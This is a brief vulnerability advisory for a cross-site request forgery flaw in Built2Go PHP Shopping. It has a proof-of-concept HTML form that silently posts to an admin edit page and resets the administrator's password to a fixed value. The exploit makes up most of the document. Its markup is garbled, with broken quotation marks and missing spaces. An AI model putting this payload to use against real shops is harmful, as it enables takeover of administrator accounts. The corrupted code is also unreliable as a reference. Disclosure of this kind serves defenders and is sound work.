source: https://www.securityfocus.com/bid/64735/info
Built2Go PHP Shopping is prone to a cross-site request-forgery vulnerability.
Exploiting the issue will allow a remote attacker to use a victim's currently active session to change the victim's password. Successful exploits will compromise affected computers.
<form method=â?POSTâ? name=â?form0? action=â? http://www.example.com/adminpanel/edit_admin.phpâ?>
<inputtype=â?hiddenâ?name=â?useridâ?value=â?ADMINâ?/><inputtype=â?hiddenâ?name=â?passâ?value=â?12121212?/><inputtype=â?hiddenâ?name=â?retypepassâ?value=â?12121212?/><inputtype=â?hiddenâ?name=â?addnewâ?value=â?1?/><inputtype=â?hiddenâ?name=â?actionâ?value=â?saveâ?/><inputtype=â?hiddenâ?name=â?newâ?value=â?Submitâ?/></form>